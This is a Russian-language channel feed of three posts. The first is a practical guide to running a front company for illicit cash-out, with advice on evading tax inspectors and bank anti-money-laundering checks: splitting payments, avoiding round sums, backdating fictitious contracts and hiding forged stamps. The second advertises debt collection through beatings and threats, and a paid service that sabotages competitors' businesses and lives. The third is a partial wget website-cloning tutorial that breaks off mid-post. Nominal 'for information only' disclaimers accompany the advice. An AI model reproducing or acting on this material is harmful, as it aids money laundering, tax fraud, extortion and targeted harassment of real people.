<?xml version="1.0" encoding="utf-8" ?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:tt="http://teletype.in/" xmlns:opensearch="http://a9.com/-/spec/opensearch/1.1/"><title>HIDDEN COMMUNITY</title><subtitle>Канал: https://t.me/hiddencommunityy
Вторая ссылка: ttps://teleg.run/joinchat/AAAAAEz7H1mCwd_hhzlrgQ</subtitle><author><name>HIDDEN COMMUNITY</name></author><id>https://teletype.in/atom/hiddencommunity</id><link rel="self" type="application/atom+xml" href="https://teletype.in/atom/hiddencommunity?offset=0"></link><link rel="alternate" type="text/html" href="https://teletype.in/@hiddencommunity?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=hiddencommunity"></link><link rel="next" type="application/rss+xml" href="https://teletype.in/atom/hiddencommunity?offset=10"></link><link rel="search" type="application/opensearchdescription+xml" title="Teletype" href="https://teletype.in/opensearch.xml"></link><updated>2026-04-15T13:19:32.274Z</updated><entry><id>hiddencommunity:6wCFVAM82</id><link rel="alternate" type="text/html" href="https://teletype.in/@hiddencommunity/6wCFVAM82?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=hiddencommunity"></link><title>Обнал. Как создать собственную обнал контору?</title><published>2020-06-19T21:17:37.184Z</published><updated>2020-06-19T21:17:37.184Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://teletype.in/files/f7/a3/f7a3e773-9ee7-4e96-867e-aa624b8e1ec9.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://teletype.in/files/9b/d9/9bd9ac7a-5246-46db-aeb7-48c681c75e20.jpeg&quot;&gt;Привет! Сегодня я вам расскажу об обнале!</summary><content type="html">
  &lt;figure class=&quot;m_retina&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/9b/d9/9bd9ac7a-5246-46db-aeb7-48c681c75e20.jpeg&quot; width=&quot;960&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Привет! Сегодня я вам расскажу об обнале!&lt;/p&gt;
  &lt;blockquote&gt;Данная статья была написана не администрацией настоящего канала и не призывает к каким-либо противоправным действиям, а изложена исключительно в ознакомительных и развлекательных целях&lt;/blockquote&gt;
  &lt;p&gt;В какой-то момент Вы возможно поймете, что обычной помойки оформленной не пойми на кого уже не хватает и возникает необходимость в создании белой (с легким серым налетом снижения НДС) и пушистой (транзитные операции) фирмы с очень хорошими оборотами и очень небольшими налогами и которая может прожить дольше чем стандартные 2-3 года. Обычно клиенты начинают работать с такими компаниями после того как они отлично отработали с стандартной помойкой, провалили камералку и выездную, и налоговики заботливо доначислили им НДС, прибыль и бонусом штрафы (все вместе 40-50%, мелочи то какие), а на суде как раньше стандартное «мы не знали что ООО «ЛАБЕАН» не платит налоги, мы не виноваты» уже не работает. Очевидно, что цена «работы» с такой компанией выше, но и шансов нарваться на вышеперечисленное меньше.&lt;/p&gt;
  &lt;h3&gt;Наброски образа&lt;/h3&gt;
  &lt;p&gt;Так как наша компания белая и пушистая, в ней будет работать некий штат сотрудников, стандартный набор из них: директор, глав.бух и менеджер.&lt;/p&gt;
  &lt;p&gt;У каждого из них будет вполне определенный набор функций, попробуем перечислить их.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Директор&lt;/strong&gt; — лицо Компании, ставит подписи на договорах и товаросопроводительных документах, мотается по банкам сначала с целью открытия рс, затем с целью спасения их после хорошей работы по ним и предоставления документов по запросам, ну и на ковер конечно тоже идет он, первая подпись в банк клиенте.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Глав.бух&lt;/strong&gt; - основная задачей оной личности является формирование отчетности, налоговое планирование, грамотные (sic!) ответы на запросы из налоговой и банков, в идеале, опять же, вторая подпись в банк клиенте ( ну и карточке образцов подписей соотв-но), «закрытие» сложных сделок в 1с.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Менеджер &lt;/strong&gt;— девушка 20 +- лет, молодой специалист, некоторые навыки работы в 1с, основное занятие — контроль за движением документов, ответы на телефонные звонки контрагентов (алло, мы тут вам платить собираемся, на какой счет? - на данный вопрос должны знать ответ все сотрудники нашей компании), создание первичной документации (тн, выставление счетов по просьбам контрагентов), рассылка информационных писем (у нас тут счет в наебанке закрылся, не платите), курьерские функции.По мере увеличения объема документации число менеджеров увеличивается согласно необходимости.&lt;/p&gt;
  &lt;p&gt;Соответственно, дальше будет перечисление некоторых признаков компании, которые желательно соблюсти и которые не будут выдавать красные флажки при ближайшем рассмотрении и немного усложнят работу правоохранительным органам при проведении всяких нехороших мероприятий по доказыванию того, что ООО «ВЕКТОР» создано с целью сохранения денег другим людям.&lt;/p&gt;
  &lt;h3&gt;Сама компания&lt;/h3&gt;
  &lt;p&gt;&lt;strong&gt;1. Учредитель и директор&lt;/strong&gt; — в идеале это разные люди, директор нанимается по трудовому договору. Естественно, без судимостей, дисквалификаций и прочей дряни.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;2. Компания создана&lt;/strong&gt; — первые 3-6 месяцев пусть не спеша раскачивается, не нужно гнать на нее сходу дикие обороты, ей нужно отлежаться перед тем как начать работать в полную силу.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;3. Уставный капитал&lt;/strong&gt; — величина в наших реалиях весьма эфемерная, а в нашем случае с одним учредителем показывающая среднюю температуру между моргом и крематорием. Стандартные 10000 внесенные столом и стулом смотрятся не очень, поэтому желательно увеличить. Как увеличивать — решайте и ищите пути сами, самый простой и дорогой это внесение денег в УК, есть способы увеличивать его почти без затрат, «из воздуха».&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;4. Юридический адрес&lt;/strong&gt; — совпадает с реальным. Согласно последним рекомендациям ЦБ, банки должны пристально обращать внимание на разногласия между юридическим и фактическим адресом, может послужить одним из поводов для отказа в открытии р/с. По адресу — располагается офис, в котором стоит телефон, стандартный набор офисной мебели, рабочие места. Так же не поленитесь с клиентов собрать буклеты, рекламные проспекты, коммерческие предложения, создайте стенд с «образцами продукции». Некоторые банки любят отправлять менеджера на предмет проверки нахождения компании по адресу, в качестве одной из частей квеста «Открой счет в bank_name», приехав и увидев что-то похожее на работающий офис — лишних вопросов не будет.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;5. «Специализированность»&lt;/strong&gt; компании — безусловно, у компании в оквэдах может быть финансовое посредничество, стройка, проектирование, медицинское оборудование и запуск космических кораблей. Но это очень сильно бросается в глаза и кричит фин.мониторингу «Куси меня!». Гораздо лучше специализировать фирму на чем-то конкретном, например на продуктах. В таком случае, основной оквэд — оптовая торговля мясом, в допах — оптовая торговля консервами, мясопродуктами, прочая оптовая торговля и еще что-нибудь из этой же тематики.&lt;/p&gt;
  &lt;p&gt;Тоже самое действует для поступления и ухода денег на рс компании: приход денег за электротовары и уход за туризм, «консультации» и топливо — идея так себе, ведет сначала к запросу документов, потом к вышвыриванию из банка по 115 фз.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;6. Внутренние документы&lt;/strong&gt; — штатное расписание (не менее 10 позиций), ведение личной карточки сотрудников, что включает в себя весь стандартный кадровый набор (заявление о приемеувольнении, заявления на отпуска, копии паспорта, прописки, инн, в случае высшего-копия диплома, график отпусков, трудовой договор, договор о материальной ответственности и т. д.), правила внутреннего трудового распорядка.&lt;/p&gt;
  &lt;p&gt;Некоторые гласят о полезности создании положения о коммерческой тайне, обклеивании по кругу всего что похоже на доказуху лентами с надписью «Коммерческая тайна», но подтвердитьопровергнуть данную инфу не могу.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;7. КДО&lt;/strong&gt;, он же &lt;strong&gt;Критерий должной осмотрительности&lt;/strong&gt;, еще одна весьма эфемерная величина, позволяющая налоговикам отказывать в вычете «входного» НДС на основании их домыслов о том, что контрагент выбран неосмотрительно (мы очень осмотрительно и выгодно купили у той помойки созданной месяц назад хз сколько станков и в целях личной прибыли перепродали их с смешной наценкой, да)&lt;/p&gt;
  &lt;p&gt;Если раньше можно было сказать, что компания проверила контрагента по сайту nalog.ru, увидела что компания действующая и на этом успокоилась, то сейчас реалии немного другие: с клиентами необходимо обмениваться набором копий уставных документов (устав, решение о назначении директора, приказ о вступлении в должность, ИНН, ОГРН), копиями договоров аренды офисасклада, свежая выписка из егрюл будет так же не лишней.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;8. Сайт&lt;/strong&gt; — он просто должен быть. Мультимедийный портал с радио, форумом и чатиком не нужен, достаточно обычной визитки с описанием компании, чем она занимается, где находится, реквизиты (инн, огрн, регистрация, юр адрес, адрес склада если есть), совсем неплохо будет прикрепить какой-нибудь прайс лист с перечнем товаров.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;9. Зарплатный проект в банке и фонд оплаты труда&lt;/strong&gt;. Белые части зарплаты — средние по отрасли в регионе, затраты на налоги снизить можно при помощи традиционных методов (отпуск за свой счет, неполный рабочий день и т. д.). Естественно работники должны знать сколько они получают согласно штатке и говорить именно это.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;10. Документооборот&lt;/strong&gt;. Можно написать талмуды по этому пункту, начиная от присваивания нумерации документам и заканчивая сроками обмена, но сие есть неблагодарное занятие, т. к. каждая команда устраивает документооборот по своему. Несколько советов:&lt;/p&gt;
  &lt;ul&gt;
    &lt;li&gt;не ленитесь раз в квартал проводить ревизию первички и договоров, на предмет отсутствующих, т. к. документы имеют свойство проебываться в прекрасное далеко. Старайтесь заводить первичку сразу после получения данных от клиента, а не откладывать это на потом.&lt;/li&gt;
    &lt;li&gt;ЧИТАЙТЕ ДОГОВОРА. Например, если в нем написано что согласование ассортимента, цены, сроков поставляемого товара идет через спецификации, значит они должны быть.&lt;/li&gt;
    &lt;li&gt;Старайтесь не использовать стандартный договор из конструктора договоров, погуглите, найдите что-то более развернутое и красивое, если сумма большая, то не стесняйтесь запросить сертификаты на товартехническое заданиеetc.&lt;/li&gt;
    &lt;li&gt;Самое главное: &amp;quot;Больше бумаги - чище жопа&amp;quot;. В этой сфере бизнеса этот принцип работает как нигде.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p&gt;&lt;strong&gt;11. НИКАКИХ ЛЕВЫХ ПЕЧАТЕЙ&lt;/strong&gt; в офисе быть не должно. Да, я понимаю что порой приходится срочно изготавливать печать, затем с ней клепать документы за «контрагента» и т. д.&lt;/p&gt;
  &lt;p&gt;Старая шутка - «Каждая левая печать — плюс полгода к сроку». Храните это добро дома под подушкой, у тещи, но не в офисе.&lt;/p&gt;
  &lt;p&gt;Следующий раздел это советы по работе с нашим основным инструментом — банками и рс в них...&lt;/p&gt;
  &lt;h3&gt;Предисловие&lt;/h3&gt;
  &lt;p&gt;Реалии прошлого года таковы, что ЦБ начал иметь банки и в хвост и в гриву, создан реестр «неблагонадежных компаний» (при залете в него вероятность что к тебе придут с целью образовательной лекции о том сколько вы должны отдать государству сильно повышается, ну и как бонус-открыть рс в банке становится ОЧЕНЬ тяжело), новости о том что ЦБ в понедельник позавтракал двумя лицензиями банков уже никого не удивляют, и госпожа Наебуллина гордо носит медаль «За взятие Мастер банка» и еще пачку орденов.&lt;/p&gt;
  &lt;h3&gt;Советы&lt;/h3&gt;
  &lt;p&gt;&lt;strong&gt;1. Выбор банков для работы&lt;/strong&gt;: расписывать можно очень много, все зависит от региона и наличия знакомых материальных договоренностей с конкретными представителями конкретного банка. Лучше, чтобы это были крупные банки из топ-100 (Сбер, Альфа, Юникредит, Газпромбанк и т. д.). Если договариваетесь с управляющим - помните, что СБ банка очень часто сидит вместе с фин.мониторингом в бэк офисе и повлиять на них он не может.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;2. Количество рс&lt;/strong&gt;: необходимо 2-3 расчетных счета, дабы в случае блокировки или, о ужас, закрытия одного из них, деньги перекидывались на другой рс, а не висели мертвым грузом.&lt;/p&gt;
  &lt;p&gt;Соответственно по мере закрытия одних счетов необходимо открывать другие. Помним, что это процесс уже занимает не один-два дня, так что как только осознаем, что запахло жареным — ищем новый банк.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;3. &lt;/strong&gt;И так, счета открыты, деньги приходят, заявки на отправку тоже есть.&lt;/p&gt;
  &lt;p&gt;Основные прописные истины здесь:&lt;/p&gt;
  &lt;ul&gt;
    &lt;li&gt;не зеркальте, вы сами сократите срок жизни данного рс ( пришло 5 мио 1 одним платежом и ушло 5 мио одним платежом, и так каждый день, 2-4 недели и RIP), старайтесь не отправлять ровные суммы ( 5 121 368 руб 25 коп для банка выглядит гораздо лучше чем просто 5 000 000 руб).&lt;/li&gt;
    &lt;li&gt;Не ленитесь выполнять одну отправку с 2 разных счетов, дробление не повредит.&lt;/li&gt;
    &lt;li&gt;До 1 мио разово спокойно платится по счету, больше и регулярно-только договор, только хардкор.&lt;/li&gt;
    &lt;li&gt;Если платите по выдуманным договорам, смотрите чтобы оно не попадало на праздникивыходныедату раньше регистрации компании которой платите.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p&gt;&lt;strong&gt;4. Рекомендательные письма&lt;/strong&gt; — будет не лишним попросить сделать парочку клиентов для вас подобные бумажки, банки любят это дело при открытии счетов.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;5. &lt;/strong&gt;Поддерживайте хорошие отношения с операционисткой, куратором вашей компании, управляющим отделения. Возможно эти люди когда-нибудь спасут вас от закрытия, проведут платеж после окончания операционного времени, успеют развернуть платеж... да много чего.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;6. &lt;/strong&gt;Старайтесь платить все хозяйственные платежи и налоги со всех счетов по очереди, т. к. иначе банк не увидев за полгода ни одного платежа за аренду и ни одной уплаты ндфл, к примеру, будет вести себя как очень ревнивая женщина и вы будете получать лишние запросы документов.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;7. &lt;/strong&gt;При открытии рс не поленитесь узнать форму доверенности банка для того, чтобы оформить ее на менеджера и она могла отвозить документыплатежкиetc.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;8. &lt;/strong&gt;Желательно банки держать на отдельном ноуте, который подключается исключительно к роутеру с настроенным white list из IP банков.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;9. &lt;/strong&gt;Не знаете что делать с остатком безнала на Новый Год? Депозит - ваш выбор! Заранее узнайте, что требуется для его размещения, чтобы не опоздать. Да и в глазах банка плюсиков наберете.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;10. &lt;/strong&gt;Ожидаете крупное поступление? Не поленитесь позвонить операционистке, предупредить и отвезти в банк, если есть конечно, все имеющиеся документы по данной сделке.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;11. Запросы из банка, блокировка банк-клиента&lt;/strong&gt;. Отвечать на них нужно быстро и по делу, везти все что просят, лишнего не везти. Если чего-то не хватает (отсутствие транспортных расходов, например) - пишите красивое письмо на бланке организации с объяснением (доставка осуществлялась силами покупателя и т. д.)&lt;/p&gt;
  &lt;p&gt;Постоянно проверяем входящую корреспонденцию в банк-клиенте!&lt;/p&gt;
  &lt;p&gt;Проебали. Не успели ответить на запрос? Скорее всего БК будет отключен, придется таскать до разблокировки платежки на бумаге, а банки обожают брать комиссию за отправку пп на бумаге (Альфа — 0.1% от суммы, например)&lt;/p&gt;
  &lt;p&gt;Так же следует помнить о том, что долго испытывать терпение банка — плохая идея, тк есть письмо ЦБ-60 Т, согласно которому в один не очень радостный для вас момент прилетает письмо об отключении банк клиента без объяснения причин и ссылкой на:&lt;/p&gt;
  &lt;p&gt;27.04.2007 № 60-Т&lt;/p&gt;
  &lt;p&gt;Об особенностях обслуживания кредитными организациями клиентов с использованием технологии дистанционного доступа к банковскому счету клиента (включая интернет-банкинг)&lt;/p&gt;
  &lt;p&gt;При заключении кредитными организациями договоров, предусматривающих обслуживание клиентов с использованием технологии дистанционного доступа к банковскому счету (включая интернет-банкинг), и создающих для уполномоченного лица (лиц) клиента возможность распоряжаться денежными средствами, находящимися на счете, используя аналог собственноручной подписи, коды, пароли и иные средства (далее - аналог собственноручной подписи), рекомендуется исходить из следующего.&lt;/p&gt;
  &lt;p&gt;Кредитным организациям рекомендуется включать в договоры право кредитной организации отказывать клиенту в приеме от него распоряжения на проведение операции по банковскому счету (вкладу), подписанному аналогом собственноручной подписи.&lt;/p&gt;
  &lt;p&gt;Кредитным организациям рекомендуется после предварительного предупреждения отказывать клиентам в приеме от них распоряжений на проведение операции по банковскому счету (вкладу), подписанных аналогом собственноручной подписи, в случае выявления сомнительных операций клиентов. При этом кредитным организациям рекомендуется принимать от таких клиентов только надлежащим образом оформленные расчетные документы на бумажном носителе.&lt;/p&gt;

</content></entry><entry><id>hiddencommunity:vWMJXX6mn</id><link rel="alternate" type="text/html" href="https://teletype.in/@hiddencommunity/vWMJXX6mn?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=hiddencommunity"></link><title>Убираем конкурентов и должников</title><published>2020-06-18T10:21:47.636Z</published><updated>2020-06-18T10:21:47.636Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://teletype.in/files/54/f0/54f0d923-6a02-43b1-bf0a-ad4a5171a023.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://teletype.in/files/6b/2a/6b2acc9c-05d0-4907-b6fd-2091e64d46ed.jpeg&quot;&gt;Приветствую вас. Сегодня мы поговорим об уничтожении вашего конкурента/врага. А делать мы это будем, конечно же, не сами, а руками других людей и даже руками самого недоброжелателя. Как? Очень просто.. Сейчас всё расскажу и покажу.</summary><content type="html">
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/6b/2a/6b2acc9c-05d0-4907-b6fd-2091e64d46ed.jpeg&quot; width=&quot;1332&quot; /&gt;
  &lt;/figure&gt;
  &lt;blockquote&gt;Приветствую вас. Сегодня мы поговорим об уничтожении вашего конкурента/врага. А делать мы это будем, конечно же, не сами, а руками других людей и даже руками самого недоброжелателя. Как? Очень просто.. Сейчас всё расскажу и покажу.&lt;/blockquote&gt;
  &lt;h4&gt;Начнем с долгов&lt;/h4&gt;
  &lt;p&gt;Представьте ситуацию, что вам задолжали более 1 млн рублей. Как бы вы не просили вернуть, как бы не давали второго шанса и не сдвигали срок долга человек никак его не отдает и, грубо говоря, забил на вас хер. На помощь вам придет профессионал своего дела. Человек, который занимается выбиванием денег с должников с 2016 года и который выбивал с людей деньги по 10.000.000р, в то время как заказчику они говорили, что у них еле-еле хватает денег на еду, а данному человеку они отдавали уже на следующий день.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Волшебство, не правда ли?&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Вот условия, по которым работает данный человек:&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;1. Кого должник знает лично (думаю все догадываются какими методами я работаю, а ментам наверняка станет интересно кто же мог отправить людей поломать потерпевшего и оставить его в луже крови с запиской в кармане &amp;quot;Верни долг Васе до конца недели или зарежем&amp;quot;);&lt;/p&gt;
  &lt;p&gt;2. Кто не знает ничего о цели (помочь собрать данные сможем, но если все данные сводятся к &amp;quot;Представился Петей, попросил дать 3 млн до завтра и исчез&amp;quot; - то вряд ли помогу);&lt;/p&gt;
  &lt;p&gt;3. Кто не готов внести предоплату за услуги (можно в гарант) минимум в 75% от полной (без учета указанной ниже премии) цены услуги (работать на условиях &amp;quot;Вон Игорь из соседнего дома должен мне 100500 млн, стрясете с него сами все и мне половину отдадите&amp;quot; не собираюсь и не буду);&lt;/p&gt;
  &lt;p&gt;4. Кто не готов оплатить мне премию минимум 25% от взысканного (25% это ставка при сумме от 5 млн руб, при меньших суммах ставка будет выше, впрочем никто часто не мешает отнести затраты на взыскание к штрафу должника);&lt;/p&gt;
  &lt;p&gt;5. У кого долг менее 1 млн рублей.&lt;/p&gt;
  &lt;h4&gt;Небольшое дополнение от исполнителя:&lt;/h4&gt;
  &lt;p&gt;&lt;strong&gt;Я не вдаюсь в подробности отношений заказчика и его должника, но практика показывает, что весьма часто отдельные участники высокодоходного (и такого же рискованного) рынка общеизвестных товаров имеют целые списки своих должников не имея возможности с них успешно взыскать долги после их кидка. Думаю все понимают о чем идет речь. Так вот, такие люди часто отлично подходят для взыскания силами моего сервиса.&lt;/strong&gt;&lt;/p&gt;
  &lt;blockquote&gt;Вот таких вот ребят можно найти, если сильно захотеть. Не занимайте деньги, если не сможете их отдать.&lt;/blockquote&gt;
  &lt;h4&gt;А что насчет конкурента?&lt;/h4&gt;
  &lt;p&gt;С должниками разобрались, а что насчет прямых конкурентов? Действовать силой на таких ребят очень опасно, так как суммы там крутятся огромные и у вашего соперника охрана будет не хуже тех же спортиков, но оснащена будет гораздо лучше. Именно поэтому есть специальные ребята, которые сделают всё без лишних следов. И нет, это не киллер. Этот исполнитель сделает всё действительно без следов, руками обидчика.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Вот что пишет он о своих услугах:&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;&amp;quot;Я предоставляю услуги по уничтожению репутации и моральной дестабилизации. Попробую объяснить подробнее. Вот живет себе человек и внезапно в его жизни начинают происходить странные события. Одно хуже другого, срываются все сделки, все валится из рук. Жизнь превращается в череду неудач. Внезапно все от него отворачиваются. Он остается один.&lt;/p&gt;
  &lt;p&gt;Объект не понимает в чем дело, вроде никто к этому не причастен, все происходит само собой. Он в отчаянии. На этом этапе некоторые могут даже пойти в церковь. Но боженька не поможет. Наоборот, все станет только хуже. И вот тогда объект уже не может, и не хочет ничего делать. Он морально мертв. Вот такими вот моральными убийствами я и занимаюсь.&lt;/p&gt;
  &lt;p&gt;Работаю через гаранта. Стоимость, как вы понимаете, зависит от конкретного случая.&amp;quot;&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;На подобное предложение ему поступил логичный вопрос:&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Дестабилизация конкурентов тема перспективная, но интересно как ты собираешься подтвердить выполнение задачи? вот провел ты атаку жертвы, исполнил массу трюков, потратил время и возможно скорее всего бабос, а жертва радостно себе живет и радуется. Плату брать будешь за совершенные действия или за результат?&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Ответ не заставил себя долго ждать:&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Как и любая работа - эта имеет свое ТЗ. Иначе говоря, мы определяем - по каким признакам клиент поймет, что моя работа была исполнена. Говоря языком аллегорий. Если господин А хочет что бы господин Б сошел с ума, то госпитализация господина Б в клинику для душевнобольных будет весьма наглядным тому доказательством. Очень, кажется, наглядная аллегория. Для других случаем мы заранее обговариваем тот результат, который хотим получить. То есть если Господин А, хочет что бы господину Б стало как то жить не по кайфу, то мы заранее уточняем моменты по которым поймем, что господину Б ой как не по кайфу живется.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt; И далее был приведен конкретный пример:&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Ко мне обратился человек с заказом на уничтожение конкурента, не физического в смысле, а как юридического лица. Это был общепит, который располагался непосредственно напротив аналогичного заведения моего клиента. В следующий месяц в заведении объекта внезапно завелись мыши, тараканы и даже муравьи. Откуда то появились неприятные запахи, от которых не помогало ничего. Клиенты стали регулярно проливать на мебель всяческие жидкости. Стали поступать многочисленные жалобы. А обслуживающий персонал стал позволять себе нецензурно браниться на посетителей. А уж драки там случались каждый день, и не просто драки, а с порчей мебели.&lt;/p&gt;
  &lt;p&gt;Вишенкой на торте стали бомжи, облюбовавшие это место для ежедневного перекуса булочкой и сладким чаем. Люди просто перестали туда ходить и заведение закрылось.&lt;/p&gt;
  &lt;blockquote&gt;Данный материал несет ознакомительный характер и не является призывом к действию. За все совершенные противоправные действия вы несёте полную ответственность. Всегда думайте своей головой.&lt;/blockquote&gt;

</content></entry><entry><id>hiddencommunity:Ome_J3HFj</id><link rel="alternate" type="text/html" href="https://teletype.in/@hiddencommunity/Ome_J3HFj?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=hiddencommunity"></link><title>Как создать клон сайта?</title><published>2020-06-15T15:36:18.736Z</published><updated>2020-06-15T15:36:18.736Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://teletype.in/files/e4/2c/e42c29bd-2db5-4967-a0da-61d95eae39b0.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://teletype.in/files/34/22/34228334-fba6-4fec-b442-de1a997fe397.jpeg&quot;&gt;Здравствуйте, друзья! Сегодня будем учиться копировать сайт и ставить его на хост. Начнем!</summary><content type="html">
  &lt;figure class=&quot;m_retina&quot;&gt;
    &lt;img src=&quot;https://teletype.in/files/34/22/34228334-fba6-4fec-b442-de1a997fe397.jpeg&quot; width=&quot;960&quot; /&gt;
  &lt;/figure&gt;
  &lt;blockquote&gt;Здравствуйте, друзья! Сегодня будем учиться копировать сайт и ставить его на хост. Начнем!&lt;/blockquote&gt;
  &lt;h3&gt;Общая информация&lt;/h3&gt;
  &lt;p&gt;На самом деле любой сайт — всего лишь код, который интерпретируется твоим браузером и приходит по запросу от хоста. Увы, но не каждый лендинг получится скопировать. Тем не менее, 70-80% из общего числа можно стянуть, что не может не радовать.&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Есть 2 способа копирования:&lt;/strong&gt;&lt;/p&gt;
  &lt;ol&gt;
    &lt;li&gt;&lt;strong&gt;Ручной.&lt;/strong&gt; Копируем файлы и код.&lt;/li&gt;
    &lt;li&gt;&lt;strong&gt;Автоматизированный. &lt;/strong&gt;Скрипты и программы.&lt;/li&gt;
  &lt;/ol&gt;
  &lt;p&gt;Мы, само собой, остановимся на 2.&lt;/p&gt;
  &lt;h3&gt;Установка и настройка софта для копирования&lt;/h3&gt;
  &lt;p&gt;Работать будем с бесплатной программой Wget, которую можно скачать по ссылке: &lt;a href=&quot;https://sourceforge.net/projects/tumagcc/files/&quot; target=&quot;_blank&quot;&gt;https://sourceforge.net/projects/tumagcc/files/&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Переходишь на сайт и скачиваешь следующий архив (версия может отличаться):&lt;/strong&gt;&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://tgraph.io/file/f62c903e2b703027f6866.png&quot; width=&quot;343&quot; /&gt;
    &lt;figcaption&gt;BLACK SIDE&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p&gt;Далее создаешь папку по следующему пути: &lt;strong&gt;C:\Program Files\Wget&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;Извлекаешь из архива файлы в папку, созданную в предыдущем пункте. После в проводнике жмешь правой кнопкой мыши по &lt;strong&gt;«Этот компьютер»&lt;/strong&gt; → &lt;strong&gt;«Свойства»&lt;/strong&gt; →&lt;strong&gt; «Дополнительные параметры системы»&lt;/strong&gt; → &lt;strong&gt;«Переменные среды»:&lt;/strong&gt;&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://tgraph.io/file/39cae6d38c8ff272c1c52.png&quot; width=&quot;380&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;В &lt;strong&gt;«Системных переменных»&lt;/strong&gt; → &lt;strong&gt;«Path»&lt;/strong&gt;:&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://tgraph.io/file/c113a9579c0042054b4d7.png&quot; width=&quot;482&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Там нажимаешь&lt;strong&gt; «Создать»&lt;/strong&gt; и указываешь путь к папке с &lt;strong&gt;Wget&lt;/strong&gt;:&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://tgraph.io/file/03416dc7075873848b611.png&quot; width=&quot;528&quot; /&gt;
  &lt;/figure&gt;
  &lt;p&gt;Во всех окнах жмешь&lt;strong&gt; «ОК».&lt;/strong&gt; Готово, установка выполнена.&lt;/p&gt;
  &lt;p&gt;Проверим, все ли сделано так, как необходимо. Для этого сочетанием клавиш &lt;strong&gt;win+R &lt;/strong&gt;вызовем окошко&lt;strong&gt; «Выполнить»&lt;/strong&gt;, введем в него&lt;strong&gt; «cmd»&lt;/strong&gt; (без кавычек), откроется командная строка. В ней пишем&lt;strong&gt; «wget»&lt;/strong&gt; (так же, без кавычек), и, если видишь такое же сообщение, то инсталляция прошла успешно:&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://tgraph.io/file/f4cf4d34322cdabd5f8a4.png&quot; width=&quot;618&quot; /&gt;
  &lt;/figure&gt;
  &lt;h3&gt;Непосредственное копирование сайта&lt;/h3&gt;
  &lt;p&gt;Допустим, ты нашел сайт, копию которого хочешь получить. Сперва обрати внимание на адрес. Если там присутствуют символы из кириллицы (www.сауны.рф), то необходимо будет их конвертировать в корректный для работы Wget вид с помощью &lt;a href=&quot;http://wwhois.ru/punycode.php&quot; target=&quot;_blank&quot;&gt;http://wwhois.ru/punycode.php&lt;/a&gt;:&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://tgraph.io/file/843897c3c6f1637e12526.png&quot; width=&quot;664&quot; /&gt;
  &lt;/figure&gt;
  &lt;blockquote&gt;Процесс копирования продемонстрирую на примере &lt;a href=&quot;http://kinder-big.ru/&quot; target=&quot;_blank&quot;&gt;http://kinder-big.ru&lt;/a&gt;&lt;/blockquote&gt;
  &lt;p&gt;Заходим в командную строку и прописываем: &lt;strong&gt;wget --page-requisites -r -l 10 адрес_копируемого_сайта&lt;/strong&gt;&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;В данном конкретном случае команда будет выглядеть так:&lt;/strong&gt;&lt;/p&gt;
  &lt;figure class=&quot;m_original&quot;&gt;
